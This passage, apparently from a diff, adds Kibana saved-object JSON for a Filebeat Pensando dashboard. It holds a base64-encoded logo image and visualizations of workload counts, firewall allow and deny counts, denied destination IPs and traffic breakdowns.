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)](https://pensando.io)", + "openLinksInNewTab": true + }, + "title": "Logo [Filebeat Pensando]", + "type": "markdown" + } + }, + "id": "39e26d70-cc4d-11ea-918e-c778f7abe5d7", + "migrationVersion": { + "visualization": "7.8.0" + }, + "references": [], + "type": "visualization", + "updated_at": "2020-09-10T22:03:40.485Z", + "version": "WzI1MDIsMTFd" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "kuery", + "query": "" + } + } + }, + "title": "Active Workload Count [Filebeat Pensando]", + "uiStateJSON": {}, + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": { + "customLabel": "Active Workloads", + "field": "client.ip" + }, + "schema": "metric", + "type": "cardinality" + } + ], + "params": { + "addLegend": false, + "addTooltip": true, + "metric": { + "colorSchema": "Green to Red", + "colorsRange": [ + { + "from": 0, + "to": 10000 + } + ], + "invertColors": false, + "labels": { + "show": false + }, + "metricColorMode": "None", + "percentageMode": false, + "style": { + "bgColor": false, + "bgFill": "#000", + "fontSize": 36, + "labelColor": false, + "subText": "" + }, + "useRanges": false + }, + "type": "metric" + }, + "title": "Active Workload Count [Filebeat Pensando]", + "type": "metric" + } + }, + "id": "bc6a36b0-cdba-11ea-a0ef-8f5241e594be", + "migrationVersion": { + "visualization": "7.8.0" + }, + "references": [ + { + "id": "filebeat-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + } + ], + "type": "visualization", + "updated_at": "2020-09-10T22:32:05.773Z", + "version": "WzI1NjIsMTFd" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "kuery", + "query": "" + } + } + }, + "title": "DFW Allowed Count [Filebeat Pensando]", + "uiStateJSON": {}, + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": { + "customLabel": "" + }, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "customLabel": "", + "exclude": "denied", + "field": "event.action", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": false, + "otherBucketLabel": "Other", + "size": 5 + }, + "schema": "group", + "type": "terms" + } + ], + "params": { + "addLegend": false, + "addTooltip": true, + "metric": { + "colorSchema": "Green to Red", + "colorsRange": [ + { + "from": 0, + "to": 10000 + } + ], + "invertColors": false, + "labels": { + "show": false + }, + "metricColorMode": "None", + "percentageMode": false, + "style": { + "bgColor": false, + "bgFill": "#000", + "fontSize": 30, + "labelColor": false, + "subText": "" + }, + "useRanges": false + }, + "type": "metric" + }, + "title": "DFW Allowed Count [Filebeat Pensando]", + "type": "metric" + } + }, + "id": "fa745d10-cc88-11ea-918e-c778f7abe5d7", + "migrationVersion": { + "visualization": "7.8.0" + }, + "references": [ + { + "id": "filebeat-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + } + ], + "type": "visualization", + "updated_at": "2020-09-10T21:55:19.408Z", + "version": "WzI0ODQsMTFd" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "kuery", + "query": "" + } + } + }, + "title": "DFW Denied Count [Filebeat Pensando]", + "uiStateJSON": {}, + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": { + "customLabel": "packet count" + }, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "customLabel": "", + "exclude": "allowed", + "field": "event.action", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": false, + "otherBucketLabel": "Other", + "size": 5 + }, + "schema": "group", + "type": "terms" + } + ], + "params": { + "addLegend": false, + "addTooltip": true, + "metric": { + "colorSchema": "Green to Red", + "colorsRange": [ + { + "from": 0, + "to": 10000 + } + ], + "invertColors": false, + "labels": { + "show": false + }, + "metricColorMode": "None", + "percentageMode": false, + "style": { + "bgColor": false, + "bgFill": "#000", + "fontSize": 30, + "labelColor": false, + "subText": "" + }, + "useRanges": false + }, + "type": "metric" + }, + "title": "DFW Denied Count [Filebeat Pensando]", + "type": "metric" + } + }, + "id": "1d2d5f00-cc89-11ea-918e-c778f7abe5d7", + "migrationVersion": { + "visualization": "7.8.0" + }, + "references": [ + { + "id": "filebeat-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + } + ], + "type": "visualization", + "updated_at": "2020-09-10T22:21:26.142Z", + "version": "WzI1NDAsMTFd" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": "Denied Destination IPs", + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "event.action", + "negate": false, + "params": { + "query": "denied" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.action": "denied" + } + } + } + ], + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "kuery", + "query": "event.action: \"denied\" " + } + } + }, + "title": "Denied Destination IPs [Filebeat Pensando]", + "uiStateJSON": {}, + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": {}, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "field": "server.ip", + "json": "", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": false, + "otherBucketLabel": "Other", + "size": 25 + }, + "schema": "segment", + "type": "terms" + } + ], + "params": { + "maxFontSize": 36, + "minFontSize": 14, + "orientation": "single", + "scale": "linear", + "showLabel": false + }, + "title": "Denied Destination IPs [Filebeat Pensando]", + "type": "tagcloud" + } + }, + "id": "bf9d4650-cc8a-11ea-918e-c778f7abe5d7", + "migrationVersion": { + "visualization": "7.8.0" + }, + "references": [ + { + "id": "filebeat-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + }, + { + "id": "filebeat-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + } + ], + "type": "visualization", + "updated_at": "2020-09-10T21:57:10.267Z", + "version": "WzI0ODgsMTFd" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "kuery", + "query": "" + } + } + }, + "title": "Traffic by Workload Pie [Filebeat Pensando]", + "uiStateJSON": { + "vis": { + "legendOpen": false + } + }, + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": {}, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "field": "client.ip", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": false, + "otherBucketLabel": "Other", + "size": 25 + }, + "schema": "segment", + "type": "terms" + } + ], + "params": { + "addLegend": true, + "addTooltip": true, + "isDonut": false, + "labels": { + "last_level": true, + "show": false, + "truncate": 100, + "values": true + }, + "legendPosition": "right", + "type": "pie" + }, + "title": "Traffic by Workload Pie [Filebeat Pensando]", + "type": "pie" + } + }, + "id": "07983660-cd38-11ea-a0ef-8f5241e594be", + "migrationVersion": { + "visualization": "7.8.0" + }, + "references": [ + { + "id": "filebeat-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + } + ], + "type": "visualization", + "updated_at": "2020-09-10T21:57:31.753Z", + "version": "WzI0ODksMTFd" + }, + { + "attributes": { + "description": "Inner ring is client IP, middle ring is server IP and the outer ring is Allow vs Deny actions performed by the FW", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "kuery", + "query": "" + } + } + }, + "title": "Client to Server FW Action [Filebeat Pensando]", + "uiStateJSON": { + "vis": { + "legendOpen": false + } + }, + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": {}, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "field": "client.ip", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": false, + "otherBucketLabel": "Other", + "size": 100 + }, + "schema": "segment", + "type": "terms" + }, + { + "enabled": true, + "id": "3", + "params": { + "field": "server.ip", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": false, + "otherBucketLabel": "Other", + "size": 5 + }, + "schema": "segment", + "type": "terms" + }, + { + "enabled": true, + "id": "4", + "params": { + "field": "event.action", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": false, + "otherBucketLabel": "Other", + "size": 5 + }, + "schema": "segment", + "type": "terms" + } + ], + "params": { + "addLegend": true, + "addTooltip": true, + "isDonut": true, + "labels": { + "last_level": true, + "show": false, + "truncate": 100, + "values": false + }, + "legendPosition": "right", + "type": "pie" + }, + "title": "Client to Server FW Action [Filebeat Pensando]", + "type": "pie" + } + }, + "id": "fd2202d0-cc86-11ea-918e-c778f7abe5d7", + "migrationVersion": { + "visualization": "7.8.0" + }, + "references": [ + { + "id": "filebeat-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + } + ], + "type": "visualization", + "updated_at": "2020-09-10T21:56:22.329Z", + "version": "WzI0ODYsMTFd" + }, + { + "attributes": { + "description": "Firewall denies and allows plotted against each other in time series", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "title": "DFW Deny vs Allow [Filebeat Pensando]", + "uiStateJSON": {}, + "version": 1, + "visState": { + "aggs": [], + "params": { + "axis_formatter": "number", + "axis_position": "left", + "axis_scale": "normal", + "default_index_pattern": "filebeat-*", + "default_timefield": "@timestamp", + "filter": { + "language": "kuery", + "query": "event.dataset:\"pensando.dfw\" " + }, + "id": "61ca57f0-469d-11e7-af02-69e470af7417", + "index_pattern": "filebeat-*", + "interval": "", + "isModelInvalid": false, + "series": [ + { + "axis_position": "right", + "chart_type": "line", + "color": "#68BC00", + "fill": 0.5, + "filter": { + "language": "kuery", + "query": "pensando.dfw.action : \"allow\" " + }, + "formatter": "number", + "id": "61ca57f1-469d-11e7-af02-69e470af7417", + "line_width": 1, + "metrics": [ + { + "id": "61ca57f2-469d-11e7-af02-69e470af7417", + "type": "count" + } + ], + "point_size": 1, + "separate_axis": 0, + "split_color_mode": "kibana", + "split_mode": "terms", + "stacked": "none", + "terms_field": "pensando.dfw.action" + }, + { + "axis_position": "right", + "chart_type": "line", + "color": "rgba(150,10,3,1)", + "fill": 0.5, + "filter": { + "language": "kuery", + "query": "pensando.dfw.action : \"deny\" " + }, + "formatter": "number", + "id": "b6c562c0-cc84-11ea-a4da-c770c13b4387", + "line_width": 1, + "metrics": [ + { + "id": "b6c562c1-cc84-11ea-a4da-c770c13b4387", + "type": "count" + } + ], + "point_size": 1, + "separate_axis": 0, + "split_mode": "terms", + "stacked": "none", + "terms_field": "pensando.dfw.action" + }, + { + "axis_position": "right", + "chart_type": "line", + "color": "rgba(188,186,0,1)", + "fill": 0.5, + "filter": { + "language": "kuery", + "query": "pensando.dfw.action :\"none\" " + }, + "formatter": "number", + "id": "2dd6bef0-cd1f-11ea-98bc-ef8e168e330d", + "line_width": 1, + "metrics": [ + { + "id": "2dd6bef1-cd1f-11ea-98bc-ef8e168e330d", + "type": "count" + } + ], + "point_size": 1, + "separate_axis": 0, + "split_mode": "terms", + "stacked": "none", + "terms_field": "pensando.dfw.action" + } + ], + "show_grid": 1, + "show_legend": 1, + "time_field": "@timestamp", + "type": "timeseries" + }, + "title": "DFW Deny vs Allow [Filebeat Pensando]", + "type": "metrics" + } + }, + "id": 